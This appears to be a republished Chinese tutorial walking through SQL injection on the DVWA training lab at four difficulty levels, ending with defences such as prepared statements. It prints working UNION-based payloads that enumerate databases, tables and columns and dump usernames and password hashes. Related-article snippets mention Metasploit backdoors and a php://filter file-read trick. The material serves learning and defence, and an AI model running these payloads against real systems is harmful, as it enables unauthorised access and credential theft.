DVWA之SQL注入

DVWA之SQL注入

news2024/9/25 9:31:44

Low(数字型注入)

1、先确定正常和不正常的回显

回显，就是显示正在执行的批处理命令及执行的结果等。

输入1时，有回显，是正常的数据库语句： select * from table where id =1

输入5时，有回显，是正常的数据库语句： select * from table where id =5

输入6时，没有回显数据库语句： select * from table where id =6

从1~5是查询成功的，而5以后，却不显示，说明有5个用户

2、判断是否存在注入点

我先尝试数字型注入：“ ' ”，“and 1=1”，“and 1=2”

首先输入“ 1' ”，查询报错：

通过注入发现该注入为数字型，而不是字符型

参考：https://www.runoob.com/mysql/mysql-operator.html 逻辑运算符

继续输入“1 and 1=1”，查询成功：数据库查询语句： select * from table where id =1 and 1=1

当输入“1 and 1=2”的时候，查询成功：数据库查询语句： select * from table where id =1 and 1=2

3、列字段判断表列数

使用命令：1' or 1=1 order by 1 # 、 1' or 1=1 order by 2 # 、1' or 1=1 order by 3 # ，查询成功。

#是注释符号

当输入“1' or 1=1 order by 1 #”时，查询成功：

数据库查询语句展示

当输入“1' or 1=1 order by 3 #”时，查询报错：

说明执行的sql查询语句中只有两个字段，即这里的First name、Surname.

4、判断显示位

-1' union select 1,2#

啥是union

联合查询显然union会一次显示两个查询结果我们可以使得第一个查询语句作为正常内容，第二个作为查询语句来进行构造。

union注入流程：依次判断类型，字段数，回显点，依次爆库名，表名，字段名，数据

数据库语句

5、判断当前数据库\数据库版本号\当前用户信息

-1' union select group_concat(database(),version(),user()),2#

数据库查询语句展示

6、判断表名

-1' union select group_concat(database(),version(),user()),group_concat(table_name) from information_schema.tables where table_schema=database()#

FAQ

解决DVWA靶场中返回的报错信息 “Illegal mix of collations for operation ‘UNION‘ ”

7、判断字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

8、判断记字段中的数据

1' union select user,password from users#

Medium(数字型注入)

下图可以看到中级加入了一些防御，不让用户输入,只提供选择(可以用burpsuit抓包来绕过)，查看sql查询语句可以看出可能存在数字型sql注入

1、判断注入点，以及注入的类型，下图可以看到，存在注入，注入类型是数字型注入

2、猜解sql查询语句中的字段的列数，下图说明字段的列数为2

1 order by 3

3、确定回显的位置,下图可以说明有2个回显位置

1 union select 1,2#

4、获取当前数据库的名称以及版本

1 union select database(),version()#

5、获取数据库中的所有表

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

6、获取表中的所有字段名

1 union select user,password from users#

High高级（数字型注入）

点击”here to change your ID”，页面自动跳转，防御了自动化的SQL注入

参数没有做防御，在sql查询语句中限制了查询条数，可以通过burpsuit抓包，修改数据包实现绕过

1、判断注入点

2、判断列数

1' order by 2#

1' union select database(),version()#

3、判断表名

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

4、判断表记录

1' union select user,password from users#

Impossible（高级）

Impossible级别的代码采用了PDO技术，将输入与代码分隔开，这样便完全断隔了sql注入攻击

至于PDO技术为什么可以有效解决sql注入，大家可以看看这个博客

https://www.cnblogs.com/alazalazalaz/p/6056393.html

SQL Injection SQL防护总结

对参数进行预编译

使用正则表达式过滤传入的参数

字符串过滤，转义

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/187487.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

Metasploit工具使用(下)

Metasploit工具使用(下)

Metasploit工具使用1.Metasploit简介1.1.Metasploit下载1.2.其它参考1.3.本章简述2.Meterpreter2.1.简介2.2.优点2.3.注意事项2.4.整体攻击流程2.4.1.创建后门2.4.2.监听后门2.4.3.运行后门2.4.4.成功获得3.渗透后命令汇总3.1.迁移进程3.1.1.查看当前进程3.1.2.获取当前进程PID…

阅读更多...

你可能不知道的JS使用技巧

你可能不知道的JS使用技巧

数组扁平化老方案 let arr [1, 2, 4, 6,[5, 4, 5,[98, 3], [34], [7]]]; arr.toString().split(,).map(Number);新方案： flat() const arr [1, [2, [3, [4, 5]]], 6]; console.log(arr.flat(Infinity));深拷贝老方案： JSON.parse(JSON.stringify(…

阅读更多...

数据分析：Matplotlib数据可视化详细教程

数据分析：Matplotlib数据可视化详细教程

1.主要分为4种：柱状图，直方图，散点图，饼状图可视化的工具选择：可视化的Python软件包工具的优点：可以自制图形定义功能绘图程序步骤： 第一步导包中Pyplot模块，以as为别名引入包…

阅读更多...

蓝桥杯重点（C/C++）（随时更新，更新时间：2023.1.31）

蓝桥杯重点（C/C++）（随时更新，更新时间：2023.1.31）

点关注不迷路，欢迎推荐给更多人，大约两天更新一次，建议点赞收藏加关注本次更新内容：2.18 递归目录 1 技巧 1.1 取消同步（节约时间，甚至能多骗点分，最好每个程序都写上） 1.…

阅读更多...

代谢组学文献解读:高胆固醇饮食与脂肪肝相关肝癌的关系

代谢组学文献解读:高胆固醇饮食与脂肪肝相关肝癌的关系

代谢组学文献分享，非酒精性脂肪性肝病（Non-alcoholic fatty liver disease , NAFLD)是全世界日趋普遍的慢性肝病。随着肥胖和代谢综合征在全球的流行，近20年亚洲国家NAFLD增长迅速，在上海、北京、广州和香港等地区成人NAFLD患病率…

阅读更多...

【论文简述】Multiview Stereo with Cascaded Epipolar RAFT（arxiv 2022）

【论文简述】Multiview Stereo with Cascaded Epipolar RAFT（arxiv 2022）

一、论文简述 1. 第一作者：Zeyu Ma 2. 发表年份：2022 3. 发表期刊：arxiv 4. 关键词：MVS、RAFT、级联、极线 5. 探索动机：3D卷积在计算和内存方面成本很高，在有限资源条件下限制重建质量。 However, a …

阅读更多...

CISP-PTE 学习记录

CISP-PTE 学习记录

CISP-PTE 学习记录题目链接1 http://49.232.193.10:2083/start/index.php?pagehello.html write up: http://49.232.193.10:2083/start/index.php?pagephp://filter/readconvert.base64-encode/resource…/key.php 知识点: php伪协议，php伪协议是可以读取到ww…

阅读更多...

【运维】Linux/Ec2挂载卷与NFS搭建实站讲解

【运维】Linux/Ec2挂载卷与NFS搭建实站讲解

英文Network File System(NFS)，是由SUN公司研制的UNIX表示层协议(presentation layer protocol)，能使使用者访问网络上别处的文件就像在使用自己的计算机一样。NFS在实际场景中有着不少的应用场景，比如分布式代码部署下，代码一致性…

阅读更多...

关于微软商店无法加载页面显示错误代码0x80131500的解决办法

关于微软商店无法加载页面显示错误代码0x80131500的解决办法

目录一、误删系统文件导致Microsoft Store无法打开1.运行 SFC 和 DISM2.尝试修复或者重置微软应用商店3.重新部署 Microsoft Store4.运行Windows疑难解答5.对系统镜像进行无损修复二、其他原因导致Microsoft Store无法打开1.调整网络连接2.更改DNS3.清理应用商店的缓存4.调整 I…

阅读更多...

java-raft框架之atomix进行分布式管理

java-raft框架之atomix进行分布式管理

共识算法在一个分布式的系统中，管理各个节点的一致性（共识）一直是个很有难度的问题。在近几十年的发展中，于1990年诞生的Paxos算法是其中最为经典的代表，并一统江湖数几十载。如著名的zookeeper、chubby都是基于…

阅读更多...

操作系统（day03）-- 进程

操作系统（day03）-- 进程

文章目录进程进程的定义进程的组成进程的组织进程的特征进程的状态-五种基本状态进程状态的转换进程控制进程控制的定义进程控制相关的原语进程系统并发运行多个程序，它需要将程序代码、数据段存放到内存的某个位置，那系统怎么知道哪个内存的数据在哪呢…

阅读更多...

注册公司选择认缴or实缴？如何查验公司实际资金？

注册公司选择认缴or实缴？如何查验公司实际资金？

目录前言实缴制认缴制认缴制还是实缴制呢，哪个更好？ 1、如果你的启动资金比较少，建议选认缴制： 2、有27类的公司暂不推行注册资金认缴制： 3、如何查看公司实际的公司实缴金额? 4、认缴不需要验资&#xf…

阅读更多...

【原文核心对照代码】【一文足以系列】A-LOAM里程计部分简短精解

【原文核心对照代码】【一文足以系列】A-LOAM里程计部分简短精解

前言本文将通过论文对照代码的方式阐述A-LOAM这一神奇算法。全文保持各个章节短小精悍的风格。本文会省去一些细节，但是了解大部分的论文和代码实现已经足够了。点曲率计算与边缘点面点区分论文中通过对点云点的曲率进行如下求曲率的计算。将计算的结果跟阈值…

阅读更多...

org.slf4j.Logger无法输出日志的BUG

org.slf4j.Logger无法输出日志的BUG

场景依赖<dependency><groupId>org.apache.zookeeper</groupId><artifactId>zookeeper</artifactId><version>3.4.13</version></dependency><dependency><groupId>org.slf4j</groupId><artifactId>s…

阅读更多...

第一章 Iceberg入门介绍

第一章 Iceberg入门介绍

1、Iceberg简介本质：一种数据组织格式 1.1、应用场景 ①面向大表：单表包含数十个PB的数据 ②分布式引擎非必要：不需要分布式SQL引擎来读取或查找文件 ③高级过滤：使用表元数据，使用分区和列级统计信息修建数据文…

阅读更多...

技术管理者如何获得下属的认同？

技术管理者如何获得下属的认同？

你好，我是童军，目前是华锐技术资管营销研发团队总监。今天我将从自己的工作场景出发，讲讲我是如何和团队小伙伴相处沟通，并获得认同的。我们先看一个小故事。我刚当上主管那会儿，在和新入职同事沟通具体工作时&…

阅读更多...

【数组相关面试题】LeetCode试题

【数组相关面试题】LeetCode试题

前言：在之前我们已经学习过了顺序表的相关概念以及实现的方法，今天我们通过几个题来进行应用了解。目录1.第一题([oj链接](https://leetcode.cn/problems/remove-element/))2.第二题（[oj链接](https://leetcode.cn/problems/remove-duplicat…

阅读更多...

Ubuntu和Linux开发板网络环境搭建

Ubuntu和Linux开发板网络环境搭建

参考：https://www.bilibili.com/video/BV1n541197rk?spm_id_from333.999.0.0 目录前言STM32MP157 开发板网络环境搭建开发工具网络拓扑结构Ubuntu 常用工具安装同一网段ping 测试概念关闭Ubuntu 和Windows 防火墙电脑和开发板直连同个路由器准备工作VMware 设置查看…

阅读更多...

Java：每个开发人员职业生涯的基本Java技能

Java：每个开发人员职业生涯的基本Java技能

早在1996年，Java就首次被引入世界，如今仍然非常受欢迎。2021，全球超过35%的程序员使用这种语言。此外，它是TIOBE索引中最受欢迎的三种编程语言之一。作为Java初学者，这对你意味着什么?这意味着你必须获得竞争优势&…

阅读更多...

浏览器的URL中每个中字符的“乱码”问题，字符集的解码和编码

浏览器的URL中每个中字符的“乱码”问题，字符集的解码和编码

uft-8和Unicode字符表对应，查找可参考：https://www.utf8-chartable.de/unicode-utf8-table.pl 几个好用的字符集转换网址：http://web.chacuo.net/charseturlencode，https://123.w3cschool.cn/webtools，http://mytju.co…

阅读更多...

推荐文章

最新文章